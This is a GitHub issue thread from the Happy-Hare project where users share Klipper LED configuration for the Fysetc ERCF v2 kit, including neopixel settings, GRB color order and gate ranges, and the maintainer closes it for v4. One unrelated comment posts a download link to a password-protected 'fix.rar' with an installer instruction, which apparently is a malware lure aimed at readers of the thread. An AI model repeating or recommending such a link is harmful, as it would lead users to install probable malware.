moggieuk/Happy-Hare #402: Fysetc ERCF v2 kit LED configuration - solution!

VoronTrident, 2024-08-26:
For once, I had so much difficulty and the solution was not referenced on the net at the moment that I allow myself to help all those who are in the configuration of the LEDs of the Fysetc ERCF v2 kit.

You have to go to mmu/base/mmu_hardware.cfg:
[neopixel mmu_leds]
pin: mmu:MMU_NEOPIXEL
chain_count: 16 (for a 8 colors ERCF)
color_order: GRB (this is the important point)

And:
[mmu_leds]
num_gates: 8
led_strip: neopixel:mmu_leds
exit_range: 8-1
entry_range: 9-16
#status_index: 17
frame_rate: 24

When inserting a piece of filament, you will immediately see if you have put your LED strips in a different configuration. Ideally try to replace them rather than modify the exit or entry range

[image]
[image]

tonywk, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

trevjonez, 2025-01-22:
Worked perfect. Thanks for sharing this here.

teXupport, 2025-03-15:
Worked for me too. Although, I think the CFG format may have changed or is different on my system. In my mmu_hardware.cfg for HH v3.1.0-110 on Flashforge Adventurer 5M with Klipper Mod v00.05-beta:
```
...
[neopixel mmu_leds]
pin: mmu:MMU_NEOPIXEL
chain_count: 16
color_order: GRB

[mmu_leds]
exit_leds:   neopixel:mmu_leds (8-1)
entry_leds:  neopixel:mmu_leds (9-16)
frame_rate: 24
```

moggieuk, 2026-10-21:
I'm closing this as part of a tidy-up of old v3 issues. Happy Hare v4 is a massive architectural change from v3, so it isn't possible to address these on v3 any more.

Thanks for sharing; in v4 you can set the LED color order (e.g. GRB) directly in menuconfig.

If this still exists in Happy Hare v4 (v4.1 is the current release), **please resubmit** it as a new issue (with your `mmu.log` if relevant) and it will be reviewed.

closed 2026-10-21 by moggieuk